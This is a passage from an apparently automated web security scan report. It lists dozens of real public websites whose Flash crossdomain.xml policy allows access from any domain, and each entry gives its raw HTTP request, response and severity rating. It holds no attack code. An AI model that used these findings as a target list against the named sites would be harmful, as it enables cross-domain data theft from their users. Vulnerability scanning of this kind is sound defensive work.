The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: smp.adviva.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 17 Nov 2009 11:38:46 GMT
ETag: "c20ce1-110-4788f91a4dd80"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.5. http://www.43things.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.43things.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.43things.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 11 May 2005 21:41:11 GMT
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
7.6. http://www.about.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.about.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.about.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.specials.about.com" />
...[SNIP]...
7.7. http://www.accesshollywood.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accesshollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accesshollywood.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Content-Type: application/xml
Content-Length: 232
X-Aicache-OS: 64.210.193.113:80
Expires: Sat, 02 Apr 2011 13:45:42 GMT
Date: Sat, 02 Apr 2011 13:45:42 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" heade
...[SNIP]...
7.8. http://www.accuweather.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=7200
Content-Length: 1403
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT
Accept-Ranges: bytes
ETag: "c28f298dc2a9ca1:322cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...
7.9. http://www.addictinggames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addictinggames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.addictinggames.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1
Last-Modified: Fri, 11 Feb 2011 23:55:49 GMT
Accept-Ranges: bytes
Content-Length: 421
Cache-Control: public, max-age=86400
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:35:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- meta policy -->
   <site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.10. http://www.adriver.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adriver.ru

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:32 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 08:34:06 GMT
ETag: "458c0d-ef-4928f92b29b80"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" to-ports="80"/>
   <allow-http-request-headers-from domain="
...[SNIP]...
7.11. http://www.ajc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ajc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ajc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 100
Content-Type: text/xml
Cache-Control: max-age=1
Date: Sat, 02 Apr 2011 13:40:39 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.12. http://www.allvoices.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allvoices.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:16 GMT
ETag: "578d4b-65-49fca3dce8f00"
Accept-Ranges: bytes
Content-Length: 101
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.13. http://www.ally.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ally.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ally.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=8
X-UA-Compatible: IE=8
Date: Sat, 02 Apr 2011 13:43:18 GMT
Content-Length: 279
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.14. http://www.ancestry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ancestry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ancestry.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: VARSESSION=S=2To6XE41OEWVVJSHFtyXpg%3d%3d&SLI=0&FIRSTSESSION=1&ITT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCUUID=jSELjk5wn-UrtNkDbm1ZoC; domain=.ancestry.com; expires=Wed, 02-Apr-2031 13:23:58 GMT; path=/
Set-Cookie: ATT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/
Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: VARS=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:57 GMT
Connection: close
Content-Length: 227

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
7.15. http://www.answerstv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.answerstv.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Oct 2008 07:24:02 GMT
Accept-Ranges: bytes
ETag: "0d579aa42dc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:06 GMT
Connection: close
Content-Length: 355

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.16. http://www.apartmenthomeliving.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartmenthomeliving.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
7.17. http://www.apartments.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartments.com

Response

HTTP/1.1 200 OK
Content-Length: 320
Content-Type: text/xml
Last-Modified: Thu, 29 May 2008 18:49:26 GMT
Accept-Ranges: bytes
ETag: "7d3deb7bcc1c81:0"
Server: Microsoft-IIS/7.5
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
Set-Cookie: AptAff=bcebc5f18797507fbea1f95dd9c16e6f175b4a5d707036d32d014473ac89b5b1;Path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

<?xml version="1.0"?>
<!-- http://gdata.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
...[SNIP]...
7.18. http://www.archive.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.archive.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.archive.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.32
Date: Sat, 02 Apr 2011 13:36:06 GMT
Content-Type: text/xml
Content-Length: 78
Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT
Connection: close
Expires: Sat, 02 Apr 2011 19:36:06 GMT
Cache-Control: max-age=21600
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.19. http://www.askmen.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.askmen.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Fri, 01 May 2009 14:10:22 GMT
ETag: "4d6cce-d3-468da5f967d54"-gzip
ServerHost: (null)
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:26:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:26:34 GMT
Content-Length: 211
Connection: close
Set-Cookie: NSC_btlnfo_iuuq_wjq=ffffffff090f1b3545525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
7.20. http://www.atom.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.atom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atom.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"138-1300820240000"
Last-Modified: Tue, 22 Mar 2011 18:57:20 GMT
Content-Type: text/xml
Content-Length: 138
INFO_HOST: www.atom.com
Cache-Control: max-age=837
Expires: Sat, 02 Apr 2011 14:11:37 GMT
Date: Sat, 02 Apr 2011 13:57:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/
Vary: User-Agent

<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
7.21. http://www.babelgum.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babelgum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babelgum.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
ETag: "f6804c-d0-490c48be6ef80"
Server: Apache/2.2.16
Age: 228561
Date: Sat, 02 Apr 2011 13:41:19 GMT
Last-Modified: Tue, 21 Sep 2010 12:55:42 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
7.22. http://www.biblegateway.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.biblegateway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:34:50 GMT
Content-Type: text/xml; charset=utf-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Thu, 31 Mar 2011 20:34:45 GMT
ETag: "9d7bf-cd-39486340"
Accept-Ranges: bytes
Content-Length: 205

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
7.23. http://www.bigpoint.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigpoint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigpoint.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:54:03 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 10:20:15 GMT
ETag: "12cc6f-67-493fb277695c0"
Accept-Ranges: bytes
Content-Length: 103
Vary: Accept-Encoding,User-Agent
Content-Type: application/xml
X-XTM-Node: pool-03-www-017033
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.24. http://www.bizjournals.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bizjournals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 17:11:42 GMT
ETag: "cc-48d671c40cf80"
Accept-Ranges: bytes
Content-Length: 204
ServerID: 8
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
7.25. http://www.blackberry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT
ETag: "11eadd1-c7-496d91d17a0c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
7.26. http://www.blogs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogs.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 20:12:27 GMT
ETag: "b94708-eb-49c6be65b00c0"
Accept-Ranges: bytes
Content-Length: 235
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en

<?xml version="1.0"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*" />
...[SNIP]...
7.27. http://www.bloomberg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Sun, 01 Apr 2012 13:23:23 GMT
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 19:36:53 GMT
ETag: W/"ff-4c34d755"
Date: Sat, 02 Apr 2011 13:23:23 GMT
Content-Length: 255
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-header
...[SNIP]...
7.28. http://www.boostmobile.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boostmobile.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boostmobile.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 18:38:10 GMT
Accept-Ranges: bytes
ETag: "e9bbdb9d8ce0c91:13e3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: https://apps.boostmobile.com
Date: Sat, 02 Apr 2011 13:37:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cr
...[SNIP]...
7.29. http://www.bravotv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bravotv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bravotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 424538094
Content-Type: text/xml
Varnish-X-Cache: MISS
ETag: "1f70023-13e-48d3cc9cc3480"
Last-Modified: Sat, 07 Aug 2010 14:42:10 GMT
Content-Length: 318
Cache-Control: max-age=281
Date: Sat, 02 Apr 2011 13:40:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.30. http://www.break.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.break.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.break.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Jun 2006 02:53:41 GMT
ETag: "3ed36e13f090c61:b41f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 157
Date: Sat, 02 Apr 2011 12:38:46 GMT
X-Varnish: 396558551 396540669
Age: 124
Via: 1.1 varnish
Connection: close
X-Varnish-Host: varnish03
X-Client-IP: 173.193.214.243
X-Country: US

<?xml version="1.0"?>
<!-- http://content.break.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.31. http://www.buzznet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buzznet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
